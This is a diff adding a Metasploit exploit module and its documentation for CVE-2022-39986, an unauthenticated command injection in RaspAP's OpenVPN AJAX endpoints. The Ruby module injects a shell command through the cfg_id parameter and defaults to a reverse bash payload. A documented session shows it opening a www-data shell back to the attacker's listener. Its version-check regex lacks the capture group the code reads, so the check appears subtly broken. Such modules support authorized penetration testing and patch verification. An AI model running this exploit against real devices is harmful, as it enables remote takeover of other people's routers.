Add RaspAP Unauthenticated Command Injection (CVE-2022-39986) Exploit

documentation/modules/exploit/unix/http/raspap_rce.md

@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+RaspAP is feature-rich wireless router software that just works
+on many popular Debian-based devices, including the Raspberry Pi.
+
+A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
+unauthenticated attackers to execute arbitrary commands via the cfg_id
+parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
+
+This Metasploit exploit module targets a command injection vulnerability (CVE-2022-39986) in RaspAP's web-gui PHP project,
+The vulnerability affects versions of `RaspAP` between `2.8.0` and `2.8.7`. By exploiting this flaw, an attacker can execute
+arbitrary commands. This issue was discovered and reported by Ismael0x00.
+Check [here](https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2) for the original writeup.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Follow the manual installation steps given [here](https://docs.raspap.com/manual/)
+2. After setting up the service, navigate to the `/var/www/html` directory
+3. Do `git checkout 2.8.0` for switching to the vulnerable version
+
+**Note: Project can also be installed inside a ubuntu/debian docker containers**
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/unix/http/raspap_rce`
+3. Do: `set RHOST [IP]`
+4. Do: `set RPORT [PORT]`
+5. Do: `check`
+
+## Options
+
+## Scenarios
+
+```
+msf6 > use exploit/unix/http/raspap_rce 
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(unix/http/raspap_rce) > set rhosts localhost
+rhosts => localhost
+msf6 exploit(unix/http/raspap_rce) > set lhost 192.168.2.101
+lhost => 192.168.2.101
+msf6 exploit(unix/http/raspap_rce) > set lport 4444
+lport => 4444
+msf6 exploit(unix/http/raspap_rce) > run
+
+[*] Started reverse TCP handler on 192.168.2.101:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version Detected: 2.8.0
+[*] Sending exploit
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```

modules/exploits/unix/http/raspap_rce.rb

@@ -0,0 +1,93 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'RaspAP Unauthenticated Command Injection',
+        'Description' => %q{
+          RaspAP is feature-rich wireless router software that just works
+          on many popular Debian-based devices, including the Raspberry Pi.
+          A Command injection vulnerability in RaspAP versions 2.8.0 thru 2.8.7 allows
+          unauthenticated attackers to execute arbitrary commands as root via the cfg_id
+          parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
+
+          Successfully tested against RaspAP 2.8.0 and 2.8.7.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege BALCI <egebalci[at]pm.me>', # msf module
+          'Ismael0x00', # original PoC, analysis
+        ],
+        'References' => [
+          ['CVE', '2022-39986'],
+          ['URL', 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'],
+          ['URL', 'https://github.com/advisories/GHSA-7c28-wg7r-pg6f']
+        ],
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2023-07-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of the RaspAP Web GUI', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'README.md'),
+      'method' => 'GET'
+    ) # We can read version number from README.md since the official installation method uses git
+
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ /\[Release [\d.]+\]/
+
+    if version <= Rex::Version.new('2.8.7') &&
+       version >= Rex::Version.new('2.8.0')
+      return CheckCode::Appears("Version Detected: #{version}")
+    end
+
+    CheckCode::Safe("Version not vulnerable: #{version}")
+  end
+
+  def exploit
+    print_status('Sending exploit')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'ajax', 'openvpn', 'del_ovpncfg.php'),
+      'method' => 'POST',
+      'vars_post' => {
+        'cfg_id' => ";#{payload.encoded};#"
+      }
+    )
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
+  end
+end